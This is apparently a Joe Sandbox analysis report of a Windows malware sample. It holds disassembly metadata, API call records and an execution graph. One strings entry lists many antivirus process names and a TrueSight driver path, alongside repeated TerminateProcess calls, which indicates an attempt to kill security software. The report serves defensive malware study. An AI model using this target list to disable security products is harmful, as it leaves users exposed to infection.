                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: ConsoleErrorLastMode
                                                    • String ID:
                                                    • API String ID: 953036326-0
                                                    • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                    • Instruction ID: 1d45cba373e3144e657265d0787dd09d8548c7dc169c74411370f7d5e8157246
                                                    • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                    • Instruction Fuzzy Hash: D091C432F1865296F7689FADD4812BD2BA0AB04BDCF146139DF4EABA94DF38D445C700
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                                    • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                                    • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CriticalEventSection$EnterLeaveReset
                                                    • String ID:
                                                    • API String ID: 3553466030-0
                                                    • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                    • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                                    • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                    • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CriticalEventSection$EnterLeaveReset
                                                    • String ID:
                                                    • API String ID: 3553466030-0
                                                    • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                    • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                                    • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                    • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                    • String ID:
                                                    • API String ID: 2933794660-0
                                                    • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                    • Instruction ID: 0b2b9adffba4f6f2f85a9bad4486fc57544c5ec3d98f8301e99a8f491a2228eb
                                                    • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                    • Instruction Fuzzy Hash: 64111826B14B018AEB008BB4E8552A833A4FB59798F441E31DB6D96BA4EF78D199C340
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CreateEvent$CriticalInitializeSection
                                                    • String ID:
                                                    • API String ID: 926662266-0
                                                    • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                    • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                                    • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                    • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: __except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 1467352782-3733052814
                                                    • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                    • Instruction ID: 4e264e715f2bba83e3cf8df494eacc4fa95ab92328b07929219ab6e951bb7ac4
                                                    • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                    • Instruction Fuzzy Hash: 667191325096818BD7688BA9D54577D7BA0FB04BC9F14B135DF8D8BA89CB3CD451C740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CreateFrameInfo__except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 2558813199-1018135373
                                                    • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                    • Instruction ID: b285dc5bb33a4c9336d8fbd15bcf62aefdb4bbb3f487ec252a2ef40a9ac413c9
                                                    • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                    • Instruction Fuzzy Hash: 5C517F3261874187D724AF99E1422AD77A4FB89BD9F102538EB8D8BB55CF3CE461CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: U
                                                    • API String ID: 442123175-4171548499
                                                    • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                    • Instruction ID: 1db99a7014a6a8f076d11d7ae3c4502f6b089e6e7df035ad517f22abeb934741
                                                    • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                    • Instruction Fuzzy Hash: 9741B322A19A4182DB208FA9E4453A967A0FB887D8F809031EF8E87794DF3CD441C740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: ExceptionRaise
                                                    • String ID: csm
                                                    • API String ID: 3997070919-1018135373
                                                    • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                    • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                                    • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                    • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                                    APIs
                                                      • Part of subcall function 00007FF8BFAF3A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FF8BFAF3A63
                                                    • __GSHandlerCheckCommon.LIBCMT ref: 00007FF8BFB00993
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CheckCommonHandler__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 1543384424-629598281
                                                    • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                    • Instruction ID: 54f2b84ce33ef307511592f5dc180f95ed443d2f047ee4795c26b681de15285e
                                                    • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                    • Instruction Fuzzy Hash: C8110332A1878186EB14AFAAE4411AD7764FF44FC4F089035EF881BB56CE39D861C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: TimerWaitable
                                                    • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                    • API String ID: 1823812067-484248852
                                                    • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                    • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                                    • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                    • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                                    APIs
                                                    • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8BFAF112F), ref: 00007FF8BFAF39E0
                                                    • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8BFAF112F), ref: 00007FF8BFAF3A21
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                    • Instruction ID: b64a980e96318f1e7f9a2a106ae3b3ee76e717386e0e4a037103ba4e14b04e18
                                                    • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                    • Instruction Fuzzy Hash: 69115E36608B4182EB258B29E45026977E4FB88BC8F584230DFCD47B68DF3CD551CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: TimerWaitable
                                                    • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                    • API String ID: 1823812067-3336177065
                                                    • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                    • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                                    • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                    • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                    • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                                    • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                    • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

                                                    Execution Graph

                                                    Execution Coverage:5%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:4.3%
                                                    Total number of Nodes:117
                                                    Total number of Limit Nodes:1
                                                    execution_graph 7632 29218a0 7637 2921c67 7632->7637 7633 2921eba 7635 29234d0 TerminateProcess 7635->7637 7636 2923ca0 TerminateProcess 7636->7637 7637->7633 7637->7635 7637->7636 7638 2929f2c 7637->7638 7639 2929f66 7638->7639 7642 2929f39 memcpy_s 7638->7642 7640 2929f89 memcpy_s 7639->7640 7641 2929fa5 7639->7641 7645 292b388 _invalid_parameter_noinfo TerminateProcess 7640->7645 7652 2927cf0 7641->7652 7646 2929ef0 7642->7646 7649 292b388 7642->7649 7648 2929f99 7645->7648 7646->7637 7648->7637 7660 292b220 7649->7660 7651 2929f4e 7651->7637 7653 2927d14 7652->7653 7659 2927d0f 7652->7659 7653->7659 7675 292b994 7653->7675 7655 2927d2f 7683 292bcf4 7655->7683 7659->7648 7661 292b24b 7660->7661 7664 292b2bc 7661->7664 7663 292b272 _invalid_parameter_noinfo 7663->7651 7666 292b2e6 _invalid_parameter_noinfo 7664->7666 7665 292b2f7 7665->7663 7666->7665 7671 292b3a8 7666->7671 7668 292b387 7669 292b220 _invalid_parameter_noinfo TerminateProcess 7668->7669 7670 292b3a1 7669->7670 7670->7663 7672 292b3b6 7671->7672 7673 292b3db TerminateProcess 7672->7673 7674 292b301 _invalid_parameter_noinfo 7672->7674 7674->7668 7678 292b9a8 memcpy_s 7675->7678 7676 292ba4e 7676->7655 7678->7676 7691 292aee0 7678->7691 7679 292aee0 TerminateProcess 7680 292bb09 7679->7680 7681 292ba66 memcpy_s 7681->7679 7682 292ba8c memcpy_s 7681->7682 7682->7655 7684 292bd09 7683->7684 7685 2927d52 7683->7685 7684->7685 7707 2930550 7684->7707 7687 292bd60 7685->7687 7688 292bd75 7687->7688 7689 292bd88 7687->7689 7688->7689 7713 292f2ac 7688->7713 7689->7659 7692 292aee9 7691->7692 7694 292aef8 7692->7694 7695 292fb6c 7692->7695 7694->7681 7697 292fb9c memcpy_s 7695->7697 7699 292fbc3 memcpy_s 7695->7699 7696 292fc00 7696->7694 7697->7696 7698 292fc45 memcpy_s 7697->7698 7697->7699 7701 292b388 _invalid_parameter_noinfo TerminateProcess 7698->7701 7700 292fdcc memcpy_s 7699->7700 7702 292b994 TerminateProcess 7699->7702 7704 292fcff memcpy_s 7699->7704 7700->7694 7701->7696 7703 292fcef 7702->7703 7705 292b994 TerminateProcess 7703->7705 7706 292b994 TerminateProcess 7704->7706 7705->7704 7706->7704 7708 292b994 TerminateProcess 7707->7708 7710 293055f memcpy_s 7708->7710 7709 29305aa 7709->7685 7710->7709 7711 292aee0 TerminateProcess 7710->7711 7712 29305bd 7711->7712 7714 292b994 TerminateProcess 7713->7714 7715 292f2b5 7714->7715 7716 568645 7720 567f45 7716->7720 7718 5686fd GetFileAttributesA 7719 568716 7718->7719 7721 567f6f 7720->7721 7721->7718 7722 56c9c5 7723 56c9d2 7722->7723 7724 56d204 7723->7724 7725 56ca05 7723->7725 7744 56cf71 7724->7744 7745 56a385 7724->7745 7750 56c2e5 7725->7750 7728 56ca12 7754 56aec5 7728->7754 7730 56d21f 7732 56aec5 2 API calls 7730->7732 7731 56cbbf 7733 56aec5 2 API calls 7731->7733 7734 56d44b 7732->7734 7735 56ccd1 7733->7735 7736 56aec5 2 API calls 7734->7736 7737 56aec5 2 API calls 7735->7737 7738 56d55d 7736->7738 7740 56cdb5 7737->7740 7739 56aec5 2 API calls 7738->7739 7742 56d641 7739->7742 7741 56aec5 2 API calls 7740->7741 7741->7744 7743 56aec5 2 API calls 7742->7743 7743->7744 7746 56a396 7745->7746 7747 56a45a CreateDirectoryA 7746->7747 7759 56dc75 7747->7759 7749 56a474 7749->7730 7751 56c2f6 7750->7751 7752 56dc75 2 API calls 7751->7752 7753 56c495 7752->7753 7753->7728 7755 56afc6 7754->7755 7756 56aff5 CreateFileA 7755->7756 7757 56b037 WriteFile 7756->7757 7758 56b067 7756->7758 7757->7758 7758->7731 7760 56dd30 7759->7760 7761 56dda3 GetFileAttributesA 7760->7761 7762 56ddc3 7761->7762 7764 56ddbf 7761->7764 7763 56ddd2 SetFileAttributesA 7762->7763 7762->7764 7763->7764 7764->7749 7765 568735 7766 5687a7 7765->7766 7767 56880f SleepEx 7766->7767 7768 568830 7767->7768

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.3257096209.0000000002921000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                    • Associated: 00000005.00000002.3257082753.0000000002920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.3257112817.0000000002938000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.3257127672.0000000002944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.3257140557.0000000002946000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.3257153234.0000000002948000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.3257176832.000000000297C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.3257192131.0000000002982000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.3257305709.0000000002B75000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2920000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: 360Safe.exe$360sd.exe$360tray.exe$AYAgent.aye$BLuPro.exe$BaiduSd.exe$Bka.exe$BkavService.exe$BkavSystemServer.exe$BkavSystemService.exe$BkavSystemService64.exe$BkavUtil.exe$BluProService.exe$C:\Windows\System32\drivers\189atohci.sys$D"$D"$HipsDaemon.exe$HipsMain.exe$HipsTray.exe$K7TSecurity.exe$KSafeTray.exe$KvMonXP.exe$LAVService.exe$LISFService.exe$LenovoPcManagerService.exe$LenovoTray.exe$LnvSvcFdn.exe$MsMpEng.exe$NisSrv.exe$PSafeSysTray.exe$PopWndLog.exe$PromoUtil.exe$QHActiveDefense.exe$QHSafeMain.exe$QHSafeScanner.exe$QHSafeTray.exe$QHWatchdog.exe$QMDL.exe$QMPersonalCenter.exe$QQPCMgrUpdate.exe$QQPCPatch.exe$QQPCRTP.exe$QQPCRealTimeSpeedup.exe$QQPCTray.exe$QQRepair.exe$QUHLPSVC.EXE$RavMonD.exe$SecurityHealthSystray.exe$TMBMSRV.exe$UnThreat.exe$V3Svc.exe$ZhuDongFangYu.exe$\\.\TrueSight$ad-watch.exe$ashDisp.exe$avcenter.exe$avgwdsvc.exe$avp.exe$avpui.exe$baiduSafeTray.exe$cefutil.exe$knsdtray.exe$kscan.exe$ksetupwiz.exe$kwsprotect64.exe$kxemain.exe$kxescore.exe$kxetray.exe$mpcopyaccelerator.exe$mssecess.exe$remupd.exe$rtvscan.exe$vsserv.exe$wsctrl.exe$wsctrl10.exe$wsctrl11.exe$wsctrlsvc.exe
                                                    • API String ID: 3215553584-2746239348
                                                    • Opcode ID: 04a099e1945153ba78488db7a66343e57d8327102518b5817018baafa47bfd57
                                                    • Instruction ID: 11d5a0edf62686d0f15b97c7ba8259cf42f283cc8bbeb04b89aa47e6e25bbd48
                                                    • Opcode Fuzzy Hash: 04a099e1945153ba78488db7a66343e57d8327102518b5817018baafa47bfd57
                                                    • Instruction Fuzzy Hash: AA029D36215F80D9EB65EF20E8947DA37A9F748358F500226DB9D17B68EF38C259C780

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 126 2923ca0-2923cde call 2936790 call 2923be0 131 29245e1 126->131 132 2923ce4-2923d1e call 2936a70 call 2923590 126->132 134 29245e3-2924609 call 2924620 131->134 140 2923d21-2923d28 132->140 140->140 141 2923d2a-2923d5b call 2936a70 call 2923590 140->141 146 2923d62-2923d69 141->146 146->146 147 2923d6b-2923dd4 call 2936a70 call 2923590 call 2a12e65 146->147 154 2923f20-2923f25 147->154 155 2923dda-2923e05 call 2936a70 call 2923740 147->155 154->134 155->154 160 2923e0b-2923e76 call 2936e30 call 2936a70 * 2 155->160 167 2923e80-2923e9f 160->167 168 2923e78-2923e7e 160->168 169 2923ea1-2923ea8 167->169 170 2923efe-2923f11 call 2923a20 167->170 168->169 172 2923eb6-2923ecd 169->172 173 2923eaa-2923eb4 169->173 176 2923f13-2923f1b call 2a3bd67 170->176 177 2923f2a-2923f31 170->177 175 2923ed3-2923ed5 172->175 173->175 175->170 178 2923ed7-2923ede 175->178 176->154 177->176 180 2923f33-2923f3a 177->180 181 2923ee0-2923eea 178->181 182 2923eec-2923ef7 178->182 180->176 183 2923f3c-2923fa6 call 2936a70 * 2 180->183 181->170 182->170 188 2923fb0-2923fdc 183->188 189 2923fa8-2923fae 183->189 190 2923fde-2923fe5 188->190 191 292400f-2924019 188->191 189->190 192 2923ff3-2924009 190->192 193 2923fe7-2923ff1 190->193 194 2924483-2924496 call 2923a20 191->194 195 292401f-2924026 191->195 192->191 193->191 194->176 201 292449c-29244a3 194->201 197 2924034-292404b 195->197 198 2924028-2924032 195->198 200 2924051-2924053 197->200 198->200 200->194 202 2924059-2924060 200->202 201->176 203 29244a9-29244b0 201->203 204 2924062-292406c 202->204 205 292406e-2924084 202->205 203->176 206 29244b6-2924517 call 2936a70 * 2 203->206 207 292408a-292408c 204->207 205->207 221 2924521-292454c 206->221 222 2924519-292451f 206->222 207->194 209 2924092-2924098 207->209 211 29240a6-29240d5 call 2936e30 209->211 212 292409a-29240a4 209->212 214 29240db-29240dd 211->214 212->214 214->194 216 29240e3-29240ea 214->216 219 29240f8-292410f 216->219 220 29240ec-29240f6 216->220 223 2924115-2924117 219->223 220->223 224 292454e-2924555 221->224 225 29245a6-29245b9 call 2923a20 221->225 222->224 223->194 226 292411d-2924124 223->226 228 2924563-292457a 